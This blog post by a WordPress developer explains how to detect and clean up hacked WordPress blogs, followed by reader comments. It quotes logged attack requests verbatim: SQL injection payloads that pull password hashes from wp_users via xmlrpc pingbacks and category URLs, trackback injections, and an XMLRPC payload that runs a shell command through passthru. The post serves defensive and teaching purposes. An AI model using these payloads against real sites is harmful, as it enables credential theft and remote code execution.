Categories
WordPress

Did your WordPress site get hacked?

Remember a few weeks ago there was all that noise about WordPress blogs getting hacked? Remember how everyone was urged to upgrade their blogs. You did upgrade didn’t you? No? It was inevitable that you’d be hacked. If you haven’t been hacked yet, it’s only a matter of time.

Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known about the security issues before we did and went about their merry way breaking into blogs and websites, grabbing usernames and passwords, and planting backdoor scripts to log them in again at a later date.
That’s how even diligently upgraded blogs were hacked. The bad guys got there before you.

In the last week the hackers have started again. There is no zero day WordPress exploit. There is no evidence that version 2.5.1 of WordPress is vulnerable to any exploit at this time. They’re using the old exploits all over again. This time they’re redirecting hits from Google to your blog. Those hits are instead being redirected to your-needs.info and anyresult.net

If you’ve been hacked

  1. Upgrade to the latest version of WordPress.
  2. Make sure there are no backdoors or malicious code left on your system. This will be in the form of scripts left by the hacker, or modifications to existing files. Check your theme files too.
  3. Change your passwords after upgrading and make sure the hacker didn’t create another user.
  4. Edit your wp-config.php and change or create the SECRET_KEY definition. It should look like this, but do not use the same key or it won’t be very secret, will it?

    define(‘SECRET_KEY’, ‘1234567890’ );

Hidden Code

The bad guys are using a number of ways to hide their hacks:

  • The simplest way is hiding their code in your php scripts. If your blog directory and files are writable by the webserver then a hacker has free reign to plant their code anywhere they like. wp-blog-header.php seems to be one place. Theme files are another. When you upgrade WordPress your theme files won’t be overwritten so make sure you double check those files for any strange code that uses the eval() command, or base64_decode(). Here’s a code snippet taken from here:

    < ?php

    Another hack adds different code to your php files. Look for k1b0rg or keymachine.de in your php scripts and remove that offending code if you find it.

  • Check your .htaccess file in the root of you blog. If you’ve never edited it, it’ll should look like this:

    # BEGIN WordPress
    <ifmodule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </ifmodule>
    # END WordPress

    That file may have this chunk of code too which is to do with the uploader:

    <ifmodule mod_security.c>
    <files async-upload.php>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </files>
    </ifmodule>

  • They’re also uploading PHP code disguised as jpeg files to your upload directory and adding those files to the activated plugins list. This makes it harder to find them, but not impossible:
    1. Open PHPMyAdmin and go to your blog’s options table and find the active_plugins record.
    2. Edit that record. It’s a long line. Scroll through it and you’ll find an entry that looks like ../uploads/2008/05/04/jhjyahjhnjnva.jpg. Remove that text, and make sure you remove the serialized array information for that array record. If that’s beyond you, just delete the active_plugins record and reactivate all your plugins again.
    3. Check your uploads directory for that jpg file and delete it.
    4. This Youtube video shows how to do that. I don’t think there’s any urgent need to remove the rss_* database record but it won’t hurt to do it.

Change Your Passwords

Once you’ve upgraded and verified that your install is clean again you must do the following:

  1. Change the passwords of all users on your system.
  2. Make sure the hacker hasn’t added another user account he can use to login again.

Stop the bad guys

One way of stopping the bad guys before they’ve done any major damage is by doing regular backups and installing an intrusion detection system (IDS).

  • I use Backuppc to backup all my servers every night, and a simple MySQL backup script to dump the database daily.
  • The first IDS that springs to mind is Tripwire but there are many others. I just installed AIDE to track changes on this server. What it does is give me a daily report on files that have changed in that period. If a hacker has changed a script or uploaded malicious code I’ll get an email within a day about it. It does take some fine tuning, but it’s easy to install on Debian systems (and presumably as easy on Ubuntu and Red Hat, and even Gentoo..):

    # apt-get install aide
    # vi /etc/aide/aide.conf.d/88_aide_web
    # /usr/sbin/aideinit

    In the configuration file above I put the following:

    /home/web/ Checksums
    !/home/www/logs/.*
    !/home/web/public_html/wp-content/cache/.*
    !/home/web/.*/htdocs/wp-content/cache/.*

    That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.

Please Upgrade

There is absolutely no reason not to upgrade. WordPress is famous for it’s 5 minute install, but it takes time and effort to maintain it. If you don’t want the hassle of upgrading, or don’t know how to maintain it, why not get a hosted WordPress account at WordPress.com? Does the $10 you make from advertising every month really justify the time it takes to make sure your site, your writing, your photos and other media are safe? This isn’t an advert for WordPress.com, go with any blogging system you like, but don’t make life easy for the scum out there who’ll take over your out of date software and use it to their advantage.

Help a friend

Check the source code of the blogs you read. The version number in the header will quickly tell you if their version of WordPress is out of date or not. Please leave a comment encouraging them to upgrade! The version number looks like this:

<meta name=”generator” content=”WordPress 2.5.1″ /> <!– leave this for stats –>

What does a hack look like?

I perform logging on one of my test blogs and I come across all sorts of malicious attempts to break in. Attackers use dumb bots to do their bidding so a website will be hit with all sorts of attacks, even for software that’s not installed. The bots are so dumb they’ll even come back again and again performing the same attacks.

Here’s what I call the “ekibastos attack”. It happens over a number of requests and I’ve seen it come from 87.118.100.81 on a regular basis. It uses a user agent called, “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)” which strangely enough doesn’t show up on Google at all right now.

  1. First the attacker visits your Dashboard, and then without even checking if that was successful, he tries to access wp-admin/post.php several times using HEAD requests.
  2. Then he POSTs to wp-admin/admin-ajax.php with the following POST body:

    POST: Array
    (

    Content not available.
    Please allow cookies by clicking Accept on the banner
    => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;
    )

  3. When that fails, he grabs xmlrpc.php.
  4. He then POSTs to that script, exploiting an old and long fixed bug. Here’s a snippet of the data.

    HTTP_RAW_POST_DATA: <?xml version=”1.0″?>

    <methodCall>

    <methodName>system.multicall</methodName>

    <params>

    <param><value><array><data>

    <value><struct>

    <member><name>methodName</name><value><string>pingback.extensions.getPingbacks</string></value></member>

    <member><name>params</name><value><array><data>

    <value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>

    </data></array></value></member></blockquote>

  5. That fails too so the query is repeated with similar SQL.

    <value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>

  6. Then he tries a trackback:

    URL: /wp-trackback.php?tb_id=1
    POST: Array
    (
    [title] => 1
    [url] => 1
    [blog_name] => 1
    [tb_id] => 666666\’
    [1740009377] => 1
    [496546471] => 1
    )

  7. And another trackback:

    URL: /wp-trackback.php?p=1
    POST: Array
    (
    [url] => ekibastos
    [title] => ekibastos
    [excerpt] => ekibastos
    [blog_name] => +AFw-\’)/*
    [charset] => UTF-7
    )

  8. Before finally going back to xmlrpc.php with this POST request:

    <?xml version=”1.0″?>
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param><value><string>k1b0rg’ icq: 76-86-20</string></value></param>
    <param><value><string>http://ocaoimh.ie/?p=k1b0rg#ls</string></value></param>
    <param><value><string>admin</string></value></param>
    </params>
    </methodCall>

  9. In between, he also tries the following GET requests:

    GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1
    GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1

  10. Thankfully I upgraded and all those attacks fail.

Those requests have been hitting me for months now with the latest happening 2 days ago. If that doesn’t convince you that you must upgrade and check your website, I don’t know what will.

PS. For completeness, here’s another common XMLRPC attack I see all the time. Ironically, this actually hit my server from 189.3.105.2 after I published this post.

<?xml version="1.0"?>

<methodCall>

<methodName>test.method

</methodName>

<params>

<param>

<value><name>','')); echo

'______BEGIN______';

passthru('id');

echo

'_____FIM_____';

exit;/*</name></value>

</param>

</params>

</methodCall>

Edit: Tripwire url fixed, thanks Callum

PS. If your site has been hacked, try the WordPress Exploit Scanner which will try to find any modified files and suspicious database records.

By Donncha

Donncha Ó Caoimh is a software developer at Automattic and WordPress plugin developer. He posts photos at In Photos and can also be found on Twitter.

387 replies on “Did your WordPress site get hacked?”

One thing I do is delete xmlrpc.php. I don’t have any reason to post to my blog through it, and it’s been so bad for security, that I just blow it out. Another thing I do is cat /dev/null > wp-trackback.php which makes it an empty file with no functionality. I hate trackbacks… they drive me nuts, and it seems they too have been responsible for badness. From those two things, I’ve been able to weather these security lapses via the common methods. I got smacked by a bug via an email plugin that allowed spammers to inject email into it, but that’s another story.

I got hacked. I sadly admit that I don’t know when it happened, but I caught it when I was going through referrals as listed in my SiteMeter account and I found that my site had taken a couple of google referrals for some drug.

Since I’d never posted about that drug, I thought it possible that it was comment spam, although Akismet (and Spam Karma before that) had done well in stopping comment spam.

It led me to a post on my blog. I did a “view source” in FireFox and concluded that there was code added to my “footer.php” file. I opened the file in the admin suite and cut the offending code.

How does this stuff get in?

I got hit and some of my hosting customers as well.
Thanks for showing the query they try from the url to access wp_users table. That’s why I think one of the most important steps is to change your table prefix to something other than wp_, to make it impossible to find out.
Also, stay away from fantastico installations, they are insecure.
Regards.

Ok, I upgraded, installed security plugins and still am having the referral problems. No files on my server were changed. After the upgrade they would have been gone anyway. So I downloaded and uploaded and activated a new theme – still wacky referrals, so it must be my database. I’m now renaming all the tables from wp_ to something else. Sigh.

Any ideas where to find the database crud?

Kathy, have you tried your theme folders? I had a .jpg image there called single_old.jpg which was the rogue file.

@kathy,

The database crud I found was in wp_users and wp_options.

I posted details about what I found in the WP forums back in April/May when it happened the first time.

The post with what to look for is http://wordpress.org/support/topic/168964#post-740607

The other thread with info to look for is http://wordpress.org/support/topic/141041

Basically, look for any entry in one of your options fields that has a strange looking file path with lots of dotdotslashes in it.

Is 2.3.3 okay?

The reason why I don’t upgrade is because the true blue theme for K2 hasn’t updated. I love that theme! 😛

@Summer – looking at the database itself, I have no weird active plugins and checking the options table I have no weird theme stuff. Looking at the database (from phpadmin) I see only one user and it isn’t admin as I changed that userid yesterday. I am still getting weird referrals so there is something somewhere in something. i’m going to check the jpg’s again – maybe an old theme or a non-active theme? Maybe I’ll just wipe the content directory and start from scratch…

Maybe it would be a great idea to have a plugin that can check for these vulnerabilities ? Something that can check against these routines ?

My knowledge of WP plugins is limited, but feel free to use the idea !

Paul – BloggingSupport.

@kathy,

I discovered yesterday that the same 2 IP addresses were bombarding a server of mine, trying to access wp-comments-post.php for a handful of websites using fake referrers from those same websites.

I knew they were fake because I’d moved those 15-20 domains off that one server and onto another one to prep the old one for a rebuild. The referrers were fake because there was no activity on the real sites matching those hits, and no way the real sites would have referred over to the old server for those calls.

Maybe what you’re seeing and what I was seeing yesterday was just an attack of comment spams? I’m just wondering if they chose the old IP of those domains, and had it hard-coded into their script because the sites had been previously hacked a few months ago. But yes, I went through the themes again just to be sure, and I didn’t find anything this time.

The increase in attacks is both annoying and disturbing.

thanks for this article. I unfortunately have suffered from the spam link hack. And like your article discussed, upgrading after the fact is too late. It got me bumped off google for awhile. Thought I had licked it and that is when I discovered that there were still problems.
Guess I have to dedicate a saturday to following all the advice in this article!

Confirmed: TinyMCE gets hammered on my place, which is running WP 2.5.1. My simple solution: I’ve taken down the whole /wp-includes/js/tinymce/ directory and everything underneath – problem cleanly solved.

No more issues with that @#$% editor messing up my tags, either: pure win-win.

Thanks for the very informative post…
Some of the best practices that I follow in order to keep my blog safe (although it’s not really very unsafe, not being very popular) are that I change my password regularly, every month. Passwords I use are very strong have combination of upper and lower case, special characters and numbers.
I update my blog regularly, with the help of the automatic wordpress update plugin, it really is a matter of a few clicks so I recommend that to everyone.

I recently upgraded my website but before I saw some of the codes posted here. It seems I need to root whatever evil is hiding now inside my blog.

Thanks for this very informative article.

Wow! Thanks, I wasn’t even aware of the security flaw… I upgraded when 2.5.1 came out, but didn’t realize that it was so potentially threatening. I plan on checking all of my sites to make sure they’re not vulnerable!

[…] というのが6ヶ月前だった。ところが5月に同じことがまた起こったのだ。今度は別の新しいセキュリティホールが原因で、これもWordpressがアップデートで対処できる数日前に起こった。問題は、ほとんどのブログオーナーがブログをターゲットにするハッカーの脅威に気付いていないということだ。というのも、ブログオーナーに何の警告もしないで攻撃することがあるからだ。Wordpressのセキュリティの脆弱性が、非常に多数のブログに対する自動化された攻撃を引き起こした。ときとして、サイトオーナーは何が起こっているかわかっていない。 […]

Paul – there’s this file change plugin that would be useful if you don’t want to run AIDE or Tripwire.

I wouldn’t run it as often as an hour because the find command could be intensive if your site has lots of files.

It also won’t find files that have been modified but had the modification time reset by “touch”.

I’m not aware of a php script that records checksums. That’d be useful, except that hackers could manipulate the data easily.

Thank you! Thank you! Thank you!!!

I had 2 days of redirects after I made each change in your article (the table prefix was hardest) but it has paid off. By the time I did the very last thing – the table prefix I was finding my site in the google searches anymore.

It was a LOT of work (since I am clueless when it comes to this stuff) but I got it done. There are two other sites mentioned in the comments – the 9 things and the 10 things lists and those are very helpful also. I also installed a security plugin http://semperfiwebdesign.com/plugins/wp-security-scan/ and a login lockdown plugin http://www.bad-neighborhood.com/(let me look for the links) but couldn’t get the password plugin to work. Fatal errors. (ask apache password protect)

Donncha, Thanks for the write-up but one of the harder parts to fix is the indexing down by Google if your site is compromised. I got nicked by a WordPress flaw and now I spend my time getting things corrected with Google and Yahoo.

Cheers

Leave a Reply to Usama Cancel reply